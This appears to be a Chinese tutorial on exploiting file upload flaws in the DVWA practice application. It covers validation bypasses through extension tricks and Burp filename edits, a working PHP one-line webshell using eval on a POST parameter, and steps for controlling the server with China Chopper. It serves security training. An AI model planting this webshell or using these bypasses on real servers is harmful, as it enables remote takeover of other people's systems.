上传漏洞（一句话木马、中国菜刀使用、DVWA文件上传漏洞利用）

1、常见漏洞分类

 2、常见验证手段

 可抓包后修改扩展名为图片格式，再上传可绕过验证。如：

可以修改php文件后缀为其他，再上传。如test.php.xxx

 可对图片文件添加一句话木马，再修改为.php上传，会解析为图片上传此文件。

 客户端验证绕过的方法有：

 例:

3、一句话木马

1）木马分为大马、小马和一句话木马：

      小马：文件体积小、上传文件、文件修改、文件管理

      大马：文件体积较大、功能齐全、能够提权、操作数据库等（不推荐）

     一句话木马：短小精悍、功能强大、隐蔽性好、客户端直接管理（主流）

2）中国菜刀工具使用：

百度下载工具——运行caidao.exe

 这里以php为例
首先我们先将php一句话木马上传到目标服务器中，用菜刀去尝试连接

新建一个php文档，输入一句话木马：<?php @eval($_POST['x']);?> 保存为10.php。

注意：x为菜刀连接时密码，可修改为其他字符。

再将10.php重命名为10.php.jpeg。（目标网站过滤上传ｊｐｅｇ和ｐｎｇ文件）

 打开burp软件，开启捕获。

 再选择10.php.jpeg文件上传

 将文件名修改为10.php，上传文件类型仍然是image/jpeg，可绕过上传过滤。

brup中关闭捕获。

dvwa中可见上传成功了！

 ../../表示当前路径的上一级、上一级。

复制上传成功后的路径，粘贴到当前浏览器地址的上一级、上一级得到完整路径。

即：http://ip/hackable/uploads/10.php

复制此路径，在菜刀中右键——添加——粘贴到地址栏——后面栏输入密码x——脚本类型选php——编码选gb2312——添加。

再右键此站点，选择要执行的命令——选文件管理，可操作此服务器上所有文件。